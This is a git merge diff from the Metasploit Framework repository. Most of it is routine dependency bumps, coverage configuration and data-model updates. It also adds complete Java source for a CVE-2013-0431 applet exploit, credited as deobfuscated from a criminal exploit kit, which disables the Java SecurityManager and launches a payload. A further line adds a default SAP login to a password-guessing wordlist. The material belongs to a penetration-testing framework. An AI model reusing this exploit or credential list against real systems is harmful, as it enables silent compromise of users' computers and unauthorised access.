Merge branch 'rapid7' into rsmudge-authproxyhttpstager

.simplecov

@@ -0,0 +1,58 @@
+# RM_INFO is set when using Rubymine.  In Rubymine, starting SimpleCov is
+# controlled by running with coverage, so don't explicitly start coverage (and
+# therefore generate a report) when in Rubymine.  This _will_ generate a report
+# whenever `rake spec` is run.
+unless ENV['RM_INFO']
+	SimpleCov.start
+end
+
+SimpleCov.configure do
+  # ignore this file
+	add_filter '.simplecov'
+
+	#
+	# Changed Files in Git Group
+	# @see http://fredwu.me/post/35625566267/simplecov-test-coverage-for-changed-files-only
+	#
+
+	untracked = `git ls-files --exclude-standard --others`
+	unstaged = `git diff --name-only`
+	staged = `git diff --name-only --cached`
+	all = untracked + unstaged + staged
+	changed_filenames = all.split("\n")
+
+	add_group 'Changed' do |source_file|
+		changed_filenames.detect { |changed_filename|
+			source_file.filename.end_with?(changed_filename)
+		}
+	end
+
+	#
+	# Framework (msf) related groups
+	#
+
+	add_group 'Metasploit Framework', 'lib/msf'
+	add_group 'Metasploit Framework (Base)', 'lib/msf/base'
+	add_group 'Metasploit Framework (Core)', 'lib/msf/core'
+
+	#
+	# Other library groups
+	#
+
+	add_group 'Fastlib', 'lib/fastlib'
+	add_group 'Metasm', 'lib/metasm'
+	add_group 'PacketFu', 'lib/packetfu'
+	add_group 'Rex', 'lib/rex'
+	add_group 'RKelly', 'lib/rkelly'
+	add_group 'Ruby Mysql', 'lib/rbmysql'
+	add_group 'Ruby Postgres', 'lib/postgres'
+	add_group 'SNMP', 'lib/snmp'
+	add_group 'Zip', 'lib/zip'
+
+	#
+	# Specs are reported on to ensure that all examples are being run and all
+	# lets, befores, afters, etc are being used.
+	#
+
+	add_group 'Specs', 'spec'
+end

Gemfile

@@ -7,7 +7,7 @@ gem 'activerecord'
 # Needed for some admin modules (scrutinizer_add_user.rb)
 gem 'json'
 # Database models shared between framework and Pro.
-gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.4.0'
+gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.5.1'
 # Needed by msfgui and other rpc components
 gem 'msgpack'
 # Needed by anemone crawler

Gemfile.lock

@@ -1,9 +1,9 @@
 GIT
   remote: git://github.com/rapid7/metasploit_data_models.git
-  revision: 448c1065329efea1eac76a3897f626f122666743
-  tag: 0.4.0
+  revision: 1e3e0c2effb8e1bb6cec9683b830e4244babf706
+  tag: 0.5.1
   specs:
-    metasploit_data_models (0.4.0)
+    metasploit_data_models (0.5.1)
       activerecord (>= 3.2.10)
       activesupport
       pg
@@ -12,22 +12,22 @@ GIT
 GEM
   remote: http://rubygems.org/
   specs:
-    activemodel (3.2.11)
-      activesupport (= 3.2.11)
+    activemodel (3.2.12)
+      activesupport (= 3.2.12)
       builder (~> 3.0.0)
-    activerecord (3.2.11)
-      activemodel (= 3.2.11)
-      activesupport (= 3.2.11)
+    activerecord (3.2.12)
+      activemodel (= 3.2.12)
+      activesupport (= 3.2.12)
       arel (~> 3.0.2)
       tzinfo (~> 0.3.29)
-    activesupport (3.2.11)
+    activesupport (3.2.12)
       i18n (~> 0.6)
       multi_json (~> 1.0)
     arel (3.0.2)
     builder (3.0.4)
-    coderay (1.0.8)
+    coderay (1.0.9)
     diff-lcs (1.1.3)
-    i18n (0.6.1)
+    i18n (0.6.4)
     json (1.7.7)
     method_source (0.8.1)
     msgpack (0.5.2)
@@ -35,10 +35,10 @@ GEM
     nokogiri (1.5.6)
     pcaprub (0.11.3)
     pg (0.14.1)
-    pry (0.9.10)
+    pry (0.9.12)
       coderay (~> 1.0.5)
       method_source (~> 0.8)
-      slop (~> 3.3.1)
+      slop (~> 3.4)
     rake (10.0.2)
     redcarpet (2.2.2)
     robots (0.10.1)
@@ -54,7 +54,7 @@ GEM
       multi_json (~> 1.0.3)
       simplecov-html (~> 0.5.3)
     simplecov-html (0.5.3)
-    slop (3.3.3)
+    slop (3.4.3)
     tzinfo (0.3.35)
     yard (0.8.3)
 

data/sql/migrate/20110610085000_move_old_imported_creds_to_new_files.rb

@@ -1,127 +0,0 @@
-class MoveOldImportedCredsToNewFiles < ActiveRecord::Migration
-
-	class ImportedCred < ActiveRecord::Base
-	end
-
-	class CredFile < ActiveRecord::Base
-	end
-
-	class Workspace < ActiveRecord::Base
-	end
-
-	class << self
-
-		def find_or_create_cred_path
-			cred_files_dir = nil
-			msf_base = Msf::Config.install_root
-			pro_base = File.expand_path(File.join(msf_base, "..", "engine", "lib", "pro"))
-			if File.directory? pro_base
-				cred_files_dir = File.expand_path(File.join(msf_base, "..", "cred_files"))
-				FileUtils.mkdir_p(cred_files_dir) unless File.exists?(cred_files_dir)
-				if File.directory?(cred_files_dir) and File.writable?(cred_files_dir)
-				end
-			end
-			return cred_files_dir
-		end
-
-		def find_all_imported_creds_by_workspace
-			valid_ptypes = ["smb_hash", "userpass", "password"]
-			valid_workspaces = Workspace.all.map {|w| w.id}
-			creds = {}
-			ImportedCred.all.each do |cred|
-				next unless cred.ptype
-				next unless valid_ptypes.include? cred.ptype
-				next unless cred.workspace_id
-				next unless valid_workspaces.include? cred.workspace_id
-				creds[cred.workspace_id] ||= []
-				creds[cred.workspace_id] << cred
-			end
-			return creds
-		end
-
-		def sort_creds_into_file_types(old_creds)
-			files = {}
-			old_creds.each do |wid,creds|
-				filedata = {}
-				creds.each do |cred|
-					filedata[cred.ptype] ||= []
-					case cred.ptype
-					when "smb_hash", "userpass"
-						filedata[cred.ptype] << ("%s %s" % [cred.user,cred.pass])
-					when "password"
-						filedata[cred.ptype] << cred.pass.to_s
-					end
-					files[wid] = filedata 
-				end
-			end
-			return files
-		end
-
-		def write_creds_to_files(old_creds,cred_path)
-			file_data_to_write = sort_creds_into_file_types(old_creds)
-			files_written = []
-			file_data_to_write.each do |wid, fdata_hash|
-				fdata_hash.each do |ftype,cred_data|
-					next unless cred_data
-					next if cred_data.empty?
-					fname = File.join(cred_path,"creds_#{wid}_#{ftype}-#{Time.now.utc.to_i}.txt")
-					fdata = cred_data.join("\n")
-					fh = File.open(fname, "wb")
-					begin
-						fh.write fdata
-						fh.flush
-					ensure
-						fh.close 
-					end
-					files_written << fname
-				end
-			end
-			return files_written
-		end
-
-		def register_new_files(new_files)
-			successful_count = 0
-			new_files.each do |fname|
-				next unless File.split(fname).last =~ /^creds_([0-9]+)_(userpass|password|smb_hash)\-[0-9]+\.txt$/
-				wid = $1
-				next unless Workspace.find(wid)
-				ftype = $2
-				actual_ftype = case ftype
-					when "smb_hash", "userpass"
-						"userpass" # They're treated the same
-					when "password"
-						"pass"
-					end
-				next unless actual_ftype
-				say "Registering credential file '%s' for workspace %d as type '%s'" % [fname,wid,actual_ftype]
-				cred_file = CredFile.new
-				cred_file.workspace_id = wid
-				cred_file.created_by = ""
-				cred_file.path = fname
-				cred_file.name = "#{ftype}.txt"
-				cred_file.desc = "Migrated #{ftype} credentials"
-				cred_file.ftype = actual_ftype
-				if cred_file.save
-					successful_count += 1
-					say "Successfully imported #{ftype} credentials for workspace #{wid}"
-				end
-			end
-			successful_count
-		end
-
-	end
-
-	def self.up
-		cred_path = find_or_create_cred_path
-		if cred_path
-			old_imported_creds = find_all_imported_creds_by_workspace
-			new_files = write_creds_to_files(old_imported_creds,cred_path)
-			successful_count = register_new_files(new_files)
-		end
-	end
-
-	# Sorry, can't get the old data back.
-	def self.down
-	end
-
-end

data/wordlists/sap_default.txt

@@ -6,6 +6,7 @@ SAPCPIC ADMIN
 EARLYWATCH SUPPORT
 TMSADM PASSWORD
 TMSADM ADMIN
+TMSADM $1Pawd2&
 ADMIN welcome
 ADSUSER ch4ngeme
 ADS_AGENT ch4ngeme

external/source/exploits/cve-2013-0431/B.java

@@ -0,0 +1,19 @@
+import java.security.AccessController;
+import java.security.PrivilegedExceptionAction;
+
+public class B
+  implements PrivilegedExceptionAction
+{
+  public B()
+  {
+    try
+    {
+      AccessController.doPrivileged(this); } catch (Exception e) {
+    }
+  }
+
+  public Object run() {
+    System.setSecurityManager(null);
+    return new Object();
+  }
+}

external/source/exploits/cve-2013-0431/Exploit.java

@@ -0,0 +1,93 @@
+/*
+*   From Paunch with love (Java 1.7.0_11 Exploit)
+*
+*   Deobfuscated from Cool EK by SecurityObscurity
+*
+*   https://twitter.com/SecObscurity
+*/
+import java.applet.Applet;
+import com.sun.jmx.mbeanserver.Introspector;
+import com.sun.jmx.mbeanserver.JmxMBeanServer;
+import com.sun.jmx.mbeanserver.MBeanInstantiator;
+import java.lang.invoke.MethodHandle;
+import java.lang.invoke.MethodHandles.Lookup;
+import java.lang.invoke.MethodType;
+import java.lang.reflect.InvocationTargetException;
+import java.lang.reflect.Method;
+import javax.management.ReflectionException;
+import java.io.*;
+import metasploit.Payload;
+
+public class Exploit extends Applet
+{
+
+  public void init()
+  {
+
+    try
+    {
+           int length;
+           byte[] buffer = new byte[5000];
+           ByteArrayOutputStream os = new ByteArrayOutputStream();
+
+           // read in the class file from the jar
+           InputStream is = getClass().getResourceAsStream("B.class");
+
+           // and write it out to the byte array stream
+           while( ( length = is.read( buffer ) ) > 0 )
+               os.write( buffer, 0, length );
+
+           // convert it to a simple byte array
+           buffer = os.toByteArray();
+
+          Class class1 = gimmeClass("sun.org.mozilla.javascript.internal.Context");
+
+          Method method = getMethod(class1, "enter", true);
+          Object obj = method.invoke(null, new Object[0]);
+          Method method1 = getMethod(class1, "createClassLoader", false);
+          Object obj1 = method1.invoke(obj, new Object[1]);
+
+          Class class2 = gimmeClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader");
+          Method method2 = getMethod(class2, "defineClass", false);
+
+          Class my_class = (Class)method2.invoke(obj1, new Object[] { null, buffer });
+          my_class.newInstance();
+
+          Payload.main(null);
+
+    }
+    catch (Throwable localThrowable){}
+
+  }
+
+
+   private Method getMethod(Class class1, String s, boolean flag)
+  {
+    try {
+      Method[] amethod = (Method[])Introspector.elementFromComplex(class1, "declaredMethods");
+      Method[] amethod1 = amethod;
+
+      for (int i = 0; i < amethod1.length; i++) {
+        Method method = amethod1[i];
+        String s1 = method.getName();
+        Class[] aclass = method.getParameterTypes();
+        if ((s1 == s) && ((!flag) || (aclass.length == 0))) return method;
+      }
+    } catch (Exception localException) {  }
+
+    return null;
+  }
+
+  private Class gimmeClass(String s) throws ReflectionException, ReflectiveOperationException
+  {
+    Object obj = null;
+    JmxMBeanServer jmxmbeanserver = (JmxMBeanServer)JmxMBeanServer.newMBeanServer("", null, null, true);
+    MBeanInstantiator mbeaninstantiator = jmxmbeanserver.getMBeanInstantiator();
+
+    Class class1 = Class.forName("com.sun.jmx.mbeanserver.MBeanInstantiator");
+    Method method = class1.getMethod("findClass", new Class[] { String.class, ClassLoader.class });
+    return (Class)method.invoke(mbeaninstantiator, new Object[] { s, obj });
+  }
+
+}
+

external/source/exploits/cve-2013-0431/Makefile

@@ -0,0 +1,22 @@
+# rt.jar must be in the classpath!
+
+CLASSES = \
+	Exploit.java  \
+	B.java \
+	Serializer.java
+
+.SUFFIXES: .java .class
+.java.class:
+	javac -source 1.2 -target 1.2 -cp "../../../../data/java:." $*.java
+
+all: $(CLASSES:.java=.class)
+
+install:
+	java Serializer
+	mv Exploit.class ../../../../data/exploits/cve-2013-0431/
+	mv B.class ../../../../data/exploits/cve-2013-0431/
+	mv Exploit.ser ../../../../data/exploits/cve-2013-0431/
+
+clean:
+	rm -rf *.class
+	rm -rf *.ser

external/source/exploits/cve-2013-0431/Serializer.java

@@ -0,0 +1,20 @@
+import java.io.*;
+
+public class Serializer {
+
+    public static void main(String [ ] args)
+    {
+        try {
+            Exploit b=new Exploit(); // target Applet instance
+            ByteArrayOutputStream baos=new ByteArrayOutputStream();
+            ObjectOutputStream oos=new ObjectOutputStream(baos);
+            oos.writeObject(b);
+            FileOutputStream fos=new FileOutputStream("Exploit.ser");
+            fos.write(baos.toByteArray());
+            fos.close();
+        } catch (Exception ex) {
+            ex.printStackTrace();
+        }
+    }
+
+}

lib/anemone/rex_http.rb

@@ -188,7 +188,9 @@ module Anemone
 			context,
 			url.scheme == "https",
 			'SSLv23',
-			@opts[:proxies]
+			@opts[:proxies],
+                    @opts[:username],
+                    @opts[:password]
 		)
 
 		conn.set_config(

lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Gemfile

@@ -1,10 +0,0 @@
-source "http://rubygems.org"
-
-# Specify your gem's dependencies in metasploit_data_models.gemspec
-gemspec
-
-group :test do
-  # rails is only used for testing with a dummy application in spec/dummy
-  gem 'rails'
-  gem 'rspec-rails'
-end

lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Rakefile

@@ -1,7 +0,0 @@
-require 'bundler/gem_tasks'
-require 'rspec/core/rake_task'
-
-RSpec::Core::RakeTask.new(:spec)
-
-task :default => :spec
-

lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred_file.rb

@@ -1,8 +0,0 @@
-class Mdm::CredFile < ActiveRecord::Base
-  #
-  # Relations
-  #
-  belongs_to :workspace, :class_name => 'Mdm::Workspace'
-
-  ActiveSupport.run_load_hooks(:mdm_cred_file, self)
-end

lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_vuln.rb

@@ -1,16 +0,0 @@
-class Mdm::WebVuln < ActiveRecord::Base
-  #
-  # Relations
-  #
-
-  belongs_to :web_site, :class_name => 'Mdm::WebSite'
-
-  #
-  # Serializations
-  #
-
-  serialize :params, MetasploitDataModels::Base64Serializer.new
-
-  ActiveSupport.run_load_hooks(:mdm_web_vuln, self)
-end
-

lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/version.rb

@@ -1,7 +0,0 @@
-module MetasploitDataModels
-  # MetasploitDataModels follows the {Semantic Versioning Specification http://semver.org/}.  At this time, the API
-  # is considered unstable because the database migrations are still in metasploit-framework and certain models may not
-  # be shared between metasploit-framework and pro, so models may be removed in the future.  Because of the unstable API
-  # the version should remain below 1.0.0
-  VERSION = '0.3.0'
-end

lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.gitignore

@@ -6,13 +6,19 @@
 *.gem
 # Rubymine project configuration
 .idea
+# logs
+*.log
 # Don't check in rvmrc since this is a gem
 .rvmrc
+# YARD database
+.yardoc
+# coverage report directory for simplecov/Rubymine
+coverage
+# generated yardocs
+doc
 # Installed gem versions.  Not stored for the same reasons as .rvmrc
 Gemfile.lock
 # Packaging directory for builds
 pkg/*
 # Database configuration (with passwords) for specs
 spec/dummy/config/database.yml
-# logs
-*.log

lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.simplecov

@@ -0,0 +1,38 @@
+# RM_INFO is set when using Rubymine.  In Rubymine, starting SimpleCov is
+# controlled by running with coverage, so don't explicitly start coverage (and
+# therefore generate a report) when in Rubymine.  This _will_ generate a report
+# whenever `rake spec` is run.
+unless ENV['RM_INFO']
+	SimpleCov.start
+end
+
+SimpleCov.configure do
+  load_adapter('rails')
+
+  # ignore this file
+	add_filter '.simplecov'
+
+	#
+	# Changed Files in Git Group
+	# @see http://fredwu.me/post/35625566267/simplecov-test-coverage-for-changed-files-only
+	#
+
+	untracked = `git ls-files --exclude-standard --others`
+	unstaged = `git diff --name-only`
+	staged = `git diff --name-only --cached`
+	all = untracked + unstaged + staged
+	changed_filenames = all.split("\n")
+
+	add_group 'Changed' do |source_file|
+		changed_filenames.detect { |changed_filename|
+			source_file.filename.end_with?(changed_filename)
+		}
+	end
+
+	#
+	# Specs are reported on to ensure that all examples are being run and all
+	# lets, befores, afters, etc are being used.
+	#
+
+	add_group 'Specs', 'spec'
+end

lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.yardopts

@@ -0,0 +1,4 @@
+--markup markdown
+--protected
+{app,lib}/**/*.rb
+db/migrate/*.rb

lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Gemfile

@@ -0,0 +1,22 @@
+source "http://rubygems.org"
+
+# Specify your gem's dependencies in metasploit_data_models.gemspec
+gemspec
+
+# used by dummy application
+group :development, :test do
+  # supplies factories for producing model instance for specs
+  gem 'factory_girl_rails'
+  # rails is only used for the dummy application in spec/dummy
+  gem 'rails'
+end
+
+group :test do
+  # In a full rails project, factory_girl_rails would be in both the :development, and :test group, but since we only
+  # want rails in :test, factory_girl_rails must also only be in :test.
+  # add matchers from shoulda, such as validates_presence_of, which are useful for testing validations
+  gem 'shoulda-matchers'
+  # code coverage of tests
+  gem 'simplecov', :require => false
+  gem 'rspec-rails'
+end

lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/LICENSE

@@ -1,4 +1,4 @@
-Copyright (C) 2012, Rapid7 LLC
+Copyright (C) 2012, Rapid7, Inc.
 All rights reserved.
 
 Redistribution and use in source and binary forms, with or without modification,

lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Rakefile

@@ -0,0 +1,20 @@
+#!/usr/bin/env rake
+begin
+  require 'bundler/setup'
+rescue LoadError
+  puts 'You must `gem install bundler` and `bundle install` to run rake tasks'
+end
+
+
+APP_RAKEFILE = File.expand_path('../spec/dummy/Rakefile', __FILE__)
+load 'rails/tasks/engine.rake'
+
+Bundler::GemHelper.install_tasks
+
+require 'rspec/core/rake_task'
+
+RSpec::Core::RakeTask.new(:spec)
+task :default => :spec
+
+load 'lib/tasks/yard.rake'
+

lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_vuln.rb

@@ -0,0 +1,144 @@
+# A Web Vulnerability found during a web scan or web audit.
+#
+# If you need to modify Mdm::WebVuln you can use ActiveSupport.on_load(:mdm_web_vuln) in side an initializer so that
+# your patches are reloaded on each request in development mode for your Rails application.
+#
+# @example extending Mdm::WebVuln
+#   # config/initializers/mdm_web_vuln.rb
+#   ActiveSupport.on_load(:mdm_web_vuln) do
+#     def confidence_percentage
+#       "#{confidence}%"
+#     end
+#   end
+class Mdm::WebVuln < ActiveRecord::Base
+  #
+  # CONSTANTS
+  #
+
+  # A percentage {#confidence} that the vulnerability is real and not a false positive.  0 is not allowed because there
+  # shouldn't be an {Mdm::WebVuln} record if there is 0% {#confidence} in the the finding.
+  CONFIDENCE_RANGE = 1 .. 100
+
+  # Allowed {#method methods}.
+  METHODS = [
+      'GET',
+      # XXX I don't know why PATH is a valid method when it's not an HTTP Method/Verb
+      'PATH',
+      'POST'
+  ]
+
+  # {#risk Risk} is rated on a scale from 0 (least risky) to 5 (most risky).
+  RISK_RANGE = 0 .. 5
+
+  #
+  # Associations
+  #
+
+  belongs_to :web_site, :class_name => 'Mdm::WebSite'
+
+  #
+  # Attributes
+  #
+
+  # @!attribute [rw] blame
+  #   Who to blame for the vulnerability
+  #
+  #   @return [String]
+
+  # @!attribute [rw] category
+  #   Category of this vulnerability.
+  #
+  #   @return [String]
+
+  # @!attribute [rw] confidence
+  #   Percentage confidence scanner or auditor has that this vulnerability is not a false positive
+  #
+  #   @return [Integer] 1% to 100%
+
+  # @!attribute [rw] description
+  #   Description of the vulnerability
+  #
+  #   @return [String, nil]
+
+  # @!attribute [rw] method
+  #   HTTP Methods for request that found vulnerability.  'PATH' is also allowed even though it is not an HTTP Method.
+  #
+  #   @return [String]
+  #   @see METHODS
+
+  # @!attribute [rw] name
+  #   Name of the vulnerability
+  #
+  #   @return [String]
+
+  # @!attribute [rw] path
+  #   Path portion of URL
+  #
+  #   @return [String]
+
+  # @!attribute [rw] payload
+  #   Web audit payload that gets executed by the remote server.  Used for code injection vulnerabilities.
+  #
+  #   @return [String, nil]
+
+  # @!attribute [rw] pname
+  #   Name of parameter that demonstrates vulnerability
+  #
+  #   @return [String]
+
+  # @!attribute [rw] proof
+  #   String that proves vulnerability, such as a code snippet, etc.
+  #
+  #   @return [String]
+
+  # @!attribute [rw] query
+  #   The GET query.
+  #
+  #   @return [String]
+
+  # @!attribute [rw] request
+  #
+  #   @return [String]
+
+  # @!attribute [rw] risk
+  #   {RISK_RANGE Risk} of leaving this vulnerability unpatched.
+  #
+  #   @return [Integer]
+
+  #
+  # Validations
+  #
+
+  validates :category, :presence => true
+  validates :confidence,
+            :inclusion => {
+                :in => CONFIDENCE_RANGE
+            }
+  validates :method,
+            :inclusion => {
+                :in => METHODS
+            }
+  validates :name, :presence => true
+  validates :path, :presence => true
+  validates :params, :presence => true
+  validates :pname, :presence => true
+  validates :proof, :presence => true
+  validates :risk,
+            :inclusion => {
+                :in => RISK_RANGE
+            }
+  validates :web_site, :presence => true
+
+  #
+  # Serializations
+  #
+
+  # @!attribute [rw] params
+  #   Parameters sent as part of request
+  #
+  # @return [Array<Array<(String, String)>>] Array of parameter key value pairs
+  serialize :params, MetasploitDataModels::Base64Serializer.new
+
+  ActiveSupport.run_load_hooks(:mdm_web_vuln, self)
+end
+

lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/workspace.rb

@@ -15,7 +15,6 @@ class Mdm::Workspace < ActiveRecord::Base
   # Relations
   #
 
-  has_many :cred_files, :dependent => :destroy, :class_name => 'Mdm::CredFile'
   has_many :creds, :through => :services, :class_name => 'Mdm::Cred'
   has_many :events, :class_name => 'Mdm::Event'
   has_many :hosts, :dependent => :destroy, :class_name => 'Mdm::Host'